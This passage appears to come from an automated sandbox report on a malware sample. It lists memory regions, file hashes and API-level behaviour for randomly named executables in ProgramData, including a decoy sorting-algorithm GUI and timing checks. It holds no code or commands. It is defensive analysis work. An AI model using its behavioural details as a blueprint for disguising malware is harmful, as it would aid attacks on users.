private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1
SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe
False
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_INPUT_HANDLE type = file_type False 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type False 1
Fn
Get Info STD_ERROR_HANDLE type = file_type False 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors - False 2
Fn
Module (83)
»
Operation Module Additional Information Success Count Logfile
Load OLEAUT32.DLL base_address = 0x75a00000 True 1
Fn
Load SXS.DLL base_address = 0x752d0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Handle c:\programdata\surtq5qk9h.exe base_address = 0x400000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75a00000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75be0000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x771c0000 True 1
Fn
Get Filename - process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 3
Fn
Get Filename - process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 3
Fn
Get Filename c:\programdata\surtq5qk9h.exe process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsTNT, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormat, address_out = 0x75a52055 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75a25934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCat, address_out = 0x75a259b4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x75a7f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x75a7d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarRound, address_out = 0x75a7d155 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Get Address c:\windows\syswow64\sxs.dll function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window (18)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Create Sorting Algorithm Comparison wndproc_parameter = 0 True 1
Fn
Create RadixSort wndproc_parameter = 0 True 1
Fn
Create MergeSort wndproc_parameter = 0 True 1
Fn
Create QuickSort wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = VBMsoStdCompMgr, index = 0, new_long = 246685852 False 1
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
System (2148)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 17
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:36 (Local Time) True 1
Fn
Get Time type = Ticks, time = 266808 True 4
Fn
Get Time type = Ticks, time = 266824 True 10
Fn
Get Time type = Ticks, time = 266839 True 12
Fn
Get Time type = Ticks, time = 266855 True 3
Fn
Get Time type = Ticks, time = 266870 True 9
Fn
Get Time type = Ticks, time = 266886 True 1
Fn
Get Time type = Ticks, time = 266902 True 2
Fn
Get Time type = Ticks, time = 266917 True 2
Fn
Get Time type = Ticks, time = 266933 True 9
Fn
Get Time type = Ticks, time = 266948 True 6
Fn
Get Time type = Ticks, time = 266964 True 2
Fn
Get Time type = Ticks, time = 266980 True 1
Fn
Get Time type = Ticks, time = 268306 True 1
Fn
Get Time type = Ticks, time = 268321 True 5
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 15
Fn
Get Time type = Ticks, time = 268384 True 5
Fn
Get Time type = Ticks, time = 268493 True 5
Fn
Get Time type = Ticks, time = 268602 True 1
Fn
Get Time type = Ticks, time = 268696 True 4
Fn
Get Time type = Ticks, time = 268711 True 5
Fn
Get Time type = Ticks, time = 268742 True 5
Fn
Get Time type = Ticks, time = 268774 True 1
Fn
Get Time type = Ticks, time = 268836 True 4
Fn
Get Time type = Ticks, time = 268852 True 5
Fn
Get Time type = Ticks, time = 268867 True 5
Fn
Get Time type = Ticks, time = 268883 True 5
Fn
Get Time type = Ticks, time = 268898 True 5
Fn
Get Time type = Ticks, time = 268914 True 5
Fn
Get Time type = Ticks, time = 268961 True 5
Fn
Get Time type = Ticks, time = 268992 True 5
Fn
Get Time type = Ticks, time = 269008 True 5
Fn
Get Time type = Ticks, time = 269117 True 5
Fn
Get Time type = Ticks, time = 269148 True 5
Fn
Get Time type = Ticks, time = 269164 True 17
Fn
Get Time type = Ticks, time = 269179 True 3
Fn
Get Time type = Ticks, time = 269226 True 5
Fn
Get Time type = Ticks, time = 269382 True 5
Fn
Get Time type = Ticks, time = 269507 True 5
Fn
Get Time type = Ticks, time = 269522 True 1
Fn
Get Time type = Ticks, time = 269569 True 4
Fn
Get Time type = Ticks, time = 269616 True 5
Fn
Get Time type = Ticks, time = 269632 True 1
Fn
Get Time type = Ticks, time = 269663 True 4
Fn
Get Time type = Ticks, time = 269710 True 5
Fn
Get Time type = Ticks, time = 269756 True 5
Fn
Get Time type = Ticks, time = 269803 True 5
Fn
Get Time type = Ticks, time = 269850 True 5
Fn
Get Time type = Ticks, time = 269959 True 5
Fn
Get Time type = Ticks, time = 270037 True 5
Fn
Get Time type = Ticks, time = 270100 True 5
Fn
Get Time type = Ticks, time = 270146 True 5
Fn
Get Time type = Ticks, time = 270193 True 5
Fn
Get Time type = Ticks, time = 270224 True 5
Fn
Get Time type = Ticks, time = 270287 True 5
Fn
Get Time type = Ticks, time = 270334 True 5
Fn
Get Time type = Ticks, time = 270380 True 5
Fn
Get Time type = Ticks, time = 270427 True 5
Fn
Get Time type = Ticks, time = 270474 True 5
Fn
Get Time type = Ticks, time = 270521 True 5
Fn
Get Time type = Ticks, time = 270583 True 5
Fn
Get Time type = Ticks, time = 270646 True 1
Fn
Get Time type = Ticks, time = 270739 True 4
Fn
Get Time type = Ticks, time = 270786 True 5
Fn
Get Time type = Ticks, time = 270833 True 5
Fn
Get Time type = Ticks, time = 270880 True 5
Fn
Get Time type = Ticks, time = 270926 True 5
Fn
Get Time type = Ticks, time = 270973 True 5
Fn
Get Time type = Ticks, time = 271020 True 5
Fn
Get Time type = Ticks, time = 271067 True 5
Fn
Get Time type = Ticks, time = 271114 True 5
Fn
Get Time type = Ticks, time = 271160 True 5
Fn
Get Time type = Ticks, time = 271207 True 5
Fn
Get Time type = Ticks, time = 271254 True 5
Fn
Get Time type = Ticks, time = 271301 True 5
Fn
Get Time type = Ticks, time = 271348 True 5
Fn
Get Time type = Ticks, time = 271394 True 5
Fn
Get Time type = Ticks, time = 271441 True 5
Fn
Get Time type = Ticks, time = 271488 True 5
Fn
Get Time type = Ticks, time = 271535 True 5
Fn
Get Time type = Ticks, time = 271582 True 5
Fn
Get Time type = Ticks, time = 271628 True 5
Fn
Get Time type = Ticks, time = 271675 True 5
Fn
Get Time type = Ticks, time = 271722 True 5
Fn
Get Time type = Ticks, time = 271738 True 5
Fn
Get Time type = Ticks, time = 271769 True 5
Fn
Get Time type = Ticks, time = 271800 True 1
Fn
Get Time type = Ticks, time = 271831 True 4
Fn
Get Time type = Ticks, time = 271878 True 5
Fn
Get Time type = Ticks, time = 271925 True 5
Fn
Get Time type = Ticks, time = 271972 True 5
Fn
Get Time type = Ticks, time = 272018 True 5
Fn
Get Time type = Ticks, time = 272065 True 10
Fn
Get Time type = Ticks, time = 272112 True 5
Fn
Get Time type = Ticks, time = 272190 True 5
Fn
Get Time type = Ticks, time = 272237 True 50
Fn
Get Time type = Ticks, time = 272252 True 30
Fn
Get Time type = Ticks, time = 272284 True 5
Fn
Get Time type = Ticks, time = 272299 True 5
Fn
Get Time type = Ticks, time = 272330 True 15
Fn
Get Time type = Ticks, time = 272362 True 15
Fn
Get Time type = Ticks, time = 272377 True 5
Fn
Get Time type = Ticks, time = 272455 True 10
Fn
Get Time type = Ticks, time = 272471 True 5
Fn
Get Time type = Ticks, time = 272486 True 20
Fn
Get Time type = Ticks, time = 272502 True 10
Fn
Get Time type = Ticks, time = 272518 True 25
Fn
Get Time type = Ticks, time = 272533 True 20
Fn
Get Time type = Ticks, time = 272549 True 25
Fn
Get Time type = Ticks, time = 272564 True 45
Fn
Get Time type = Ticks, time = 272580 True 30
Fn
Get Time type = Ticks, time = 272596 True 30
Fn
Get Time type = Ticks, time = 272611 True 30
Fn
Get Time type = Ticks, time = 272627 True 6
Fn
Get Time type = Ticks, time = 272642 True 39
Fn
Get Time type = Ticks, time = 272658 True 35
Fn
Get Time type = Ticks, time = 272674 True 20
Fn
Get Time type = Ticks, time = 272736 True 15
Fn
Get Time type = Ticks, time = 272752 True 25
Fn
Get Time type = Ticks, time = 272767 True 10
Fn
Get Time type = Ticks, time = 272783 True 11
Fn
Get Time type = Ticks, time = 272798 True 4
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:44 (Local Time) True 2
Fn
Get Time type = Ticks, time = 272814 True 5
Fn
Get Time type = Ticks, time = 272830 True 1
Fn
Get Time type = Ticks, time = 272845 True 4
Fn
Get Time type = Ticks, time = 272923 True 5
Fn
Get Time type = Ticks, time = 272939 True 5
Fn
Get Time type = Ticks, time = 272954 True 5
Fn
Get Time type = Ticks, time = 272970 True 5
Fn
Get Time type = Ticks, time = 273017 True 5
Fn
Get Time type = Ticks, time = 273032 True 1
Fn
Get Time type = Ticks, time = 273048 True 4
Fn
Get Time type = Ticks, time = 273064 True 5
Fn
Get Time type = Ticks, time = 273095 True 5
Fn
Get Time type = Ticks, time = 273142 True 5
Fn
Get Time type = Ticks, time = 273173 True 5
Fn
Get Time type = Ticks, time = 273220 True 5
Fn
Get Time type = Ticks, time = 273266 True 5
Fn
Get Time type = Ticks, time = 273360 True 5
Fn
Get Time type = Ticks, time = 273376 True 5
Fn
Get Time type = Ticks, time = 273391 True 20
Fn
Get Time type = Ticks, time = 273407 True 25
Fn
Get Time type = Ticks, time = 273422 True 65
Fn
Get Time type = Ticks, time = 273438 True 15
Fn
Get Time type = Ticks, time = 273454 True 15
Fn
Get Time type = Ticks, time = 273469 True 15
Fn
Get Time type = Ticks, time = 273485 True 25
Fn
Get Time type = Ticks, time = 273500 True 15
Fn
Get Time type = Ticks, time = 273516 True 20
Fn
Get Time type = Ticks, time = 273532 True 5
Fn
Get Time type = Ticks, time = 273547 True 25
Fn
Get Time type = Ticks, time = 273563 True 10
Fn
Get Time type = Ticks, time = 273610 True 5
Fn
Get Time type = Ticks, time = 273656 True 5
Fn
Get Time type = Ticks, time = 273703 True 5
Fn
Get Time type = Ticks, time = 273734 True 5
Fn
Get Time type = Ticks, time = 273750 True 15
Fn
Get Time type = Ticks, time = 273766 True 5
Fn
Get Time type = Ticks, time = 273781 True 5
Fn
Get Time type = Ticks, time = 273812 True 1
Fn
Get Time type = Ticks, time = 273828 True 4
Fn
Get Time type = Ticks, time = 273859 True 5
Fn
Get Time type = Ticks, time = 273875 True 5
Fn
Get Time type = Ticks, time = 273906 True 5
Fn
Get Time type = Ticks, time = 273953 True 5
Fn
Get Time type = Ticks, time = 273968 True 1
Fn
Get Time type = Ticks, time = 273984 True 4
Fn
Get Time type = Ticks, time = 274000 True 5
Fn
Get Time type = Ticks, time = 274031 True 5
Fn
Get Time type = Ticks, time = 274046 True 10
Fn
Get Time type = Ticks, time = 274062 True 5
Fn
Get Time type = Ticks, time = 274078 True 5
Fn
Get Time type = Ticks, time = 274093 True 5
Fn
Get Time type = Ticks, time = 274109 True 5
Fn
Get Time type = Ticks, time = 274124 True 10
Fn
Get Time type = Ticks, time = 274140 True 5
Fn
Get Time type = Ticks, time = 274156 True 5
Fn
Get Time type = Ticks, time = 274171 True 5
Fn
Get Time type = Ticks, time = 274187 True 5
Fn
Get Time type = Ticks, time = 274202 True 5
Fn
Get Time type = Ticks, time = 274218 True 10
Fn
Get Time type = Ticks, time = 274234 True 5
Fn
Get Time type = Ticks, time = 274249 True 5
Fn
Get Time type = Ticks, time = 274265 True 20
Fn
Get Time type = Ticks, time = 274280 True 40
Fn
Get Time type = Ticks, time = 274296 True 40
Fn
Get Time type = Ticks, time = 274312 True 35
Fn
Get Time type = Ticks, time = 274327 True 40
Fn
Get Time type = Ticks, time = 274343 True 35
Fn
Get Time type = Ticks, time = 274358 True 40
Fn
Get Time type = Ticks, time = 274374 True 35
Fn
Get Time type = Ticks, time = 274390 True 40
Fn
Get Time type = Ticks, time = 274405 True 30
Fn
Get Time type = Ticks, time = 274421 True 20
Fn
Get Time type = Ticks, time = 274436 True 33
Fn
Get Time type = Ticks, time = 274452 True 37
Fn
Get Time type = Ticks, time = 274468 True 40
Fn
Get Time type = Ticks, time = 274483 True 23
Fn
Get Time type = Ticks, time = 274499 True 16
Fn
Get Time type = Ticks, time = 274514 True 16
Fn
Get Time type = Ticks, time = 274530 True 16
Fn
Get Time type = Ticks, time = 274546 True 16
Fn
Get Time type = Ticks, time = 274561 True 16
Fn
Get Time type = Ticks, time = 274577 True 16
Fn
Get Time type = Ticks, time = 274592 True 10
Fn
Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create - True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #14: oyvgkgw.exe
27 0
»
Information Value
ID #14
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x62c
Parent PID 0x64 (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 708
0x 148
0x 9BC
0x 9B8
0x 9B4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x0011ffff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x0021ffff Private Memory Readable, Writable True False False -
locale.nls 0x00220000 0x00286fff Memory Mapped File Readable False False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000400000 0x00400000 0x0043cfff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000450000 0x00450000 0x00450fff Pagefile Backed Memory Readable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x0cc50000 0x0cc8bfff Memory Mapped File Readable False False False -
private_0x000000000cc50000 0x0cc50000 0x0cc8ffff Private Memory Readable, Writable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccc0000 0x0ccc0000 0x0ce40fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce50000 0x0ce50000 0x0e24ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e250000 0x0e250000 0x0e65ffff Pagefile Backed Memory Readable, Writable True False False -
sortdefault.nls 0x0e250000 0x0e51efff Memory Mapped File Readable False False False -
pagefile_0x000000000e520000 0x0e520000 0x0e92ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e520000 0x0e520000 0x0e58ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e590000 0x0e590000 0x0e66efff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e660000 0x0e660000 0x0ea6ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e670000 0x0e670000 0x0e76ffff Private Memory Readable, Writable True False False -
private_0x000000000e770000 0x0e770000 0x0e7affff Private Memory Readable, Writable True False False -
private_0x000000000e7b0000 0x0e7b0000 0x0e8affff Private Memory Readable, Writable True False False -
private_0x000000000e8b0000 0x0e8b0000 0x0e8effff Private Memory Readable, Writable True False False -
private_0x000000000e8f0000 0x0e8f0000 0x0e9effff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ed3ffff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
comsvcs.dll 0x74c10000 0x74d45fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
